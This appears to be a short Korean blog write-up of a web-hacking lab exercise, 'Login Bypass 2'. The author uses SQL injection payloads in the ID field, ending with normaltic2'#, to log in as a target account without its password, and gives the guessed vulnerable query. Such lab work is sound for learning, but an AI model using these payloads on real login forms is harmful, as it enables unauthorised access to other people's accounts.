Login Bypass 2 풀이

황인환·2024년 5월 19일

- 과제

Login Bypass 2번 normaltic2로 접속하기
ID: doldol PW: dol1234가 주어졌다.

1. Burp Suite로 패킷 분석 확인

-> 주어진 ID PW 활용
-> POST방식, cookie 변조 불가능

2. 'and'1'='1입력

ID: doldol'and'1'='1
PW: dol1234(doldol에 맞는 비밀번호)
-> WHERE id = ''이외 괄호 있는지 체크
-> 로그인 성공 괄호x

3. 주석입력 '#

ID: doldol'#
PW:1(아무거나)
-> 로그인 성공
-> 식별인증 동시

4. normaltic2 적용

ID: normaltic2'#
PW: 1(아무거나)
-> 로그인 성공

5. 예상 sql코드

$sql="SELECT * FROM users WHERE id='$id' and password='$password'";

0개의 댓글